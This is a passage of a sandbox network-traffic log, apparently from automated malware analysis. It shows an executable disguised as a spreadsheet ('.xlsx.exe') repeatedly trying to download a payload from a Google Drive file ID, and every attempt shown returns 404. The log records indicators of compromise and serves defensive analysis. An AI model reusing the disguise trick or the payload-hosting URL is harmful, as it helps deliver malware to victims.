2024-12-16 17:06:05 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:06 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:05 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-WuPG0OHLsll6lBQfPdj2oQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49894	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:07 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:08 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC78hZ8vB7uaRS0PlP3iyi3CD-5-RkxIfCt2uvNptsoSiYbQG7QrUNUu0GsYovkTm2wC Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:08 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-7amad5-KjK-4UpjSGr5GEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:06:08 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 34 58 52 45 6e 46 65 54 57 38 41 75 69 51 75 6b 6e 46 59 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f4XREnFeTW8AuiQuknFYIg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49922	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:20 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:21 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:21 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-Y5qRPOmoEoid2Dg2a0VOlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49932	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:23 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:24 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6RcJKxOcZ8kVuxTP6nHEOVSCpVeF7qhjsc4seXpcbgwBUOQR6fY5oUDMEKR-h0w8_J Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:24 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-2Jas3iTkHt7nF5dB3sLULA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:06:24 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6f 4b 57 41 76 39 4f 48 41 45 75 75 71 57 30 55 55 67 69 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eoKWAv9OHAEuuqW0UUgiaQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49956	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:36 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:37 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:37 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-6EAxgqfqluP2ZDuFnhgSPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49963	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:39 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:40 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5rPh166RMBB6xpz6w9niqgzREj2_SB50KwPB0eZ8B9vUd3N2DS24KTG5jiHA6MVSxa Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:39 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-Ef0-Lv55KyzmQgf7KTlyBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:06:40 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 51 46 5a 50 74 74 6c 5f 32 68 32 31 76 68 74 5a 4a 50 65 6b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NQFZPttl_2h21vhtZJPekg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49993	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:51 UTC	417	OUT	GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:52 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:52 GMT Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-0F28TuY2YD-gnTJiEM22SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50002	142.250.181.1	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 17:06:54 UTC	459	OUT	GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
2024-12-16 17:06:55 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6wDUyyhJyymcLpAnb-Y-MR213vNES_SiwhEusWybTLMaMid1-ffFKZRjKiB9ZguzqG Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 Dec 2024 17:06:55 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-7LMe386rfH91p3LmUy6pBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-16 17:06:55 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 74 55 33 2d 62 66 34 73 62 55 52 45 68 52 61 32 56 69 4f 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7tU3-bf4sbUREhRa2ViOUg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50022	172.217.19.174	443	5412	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
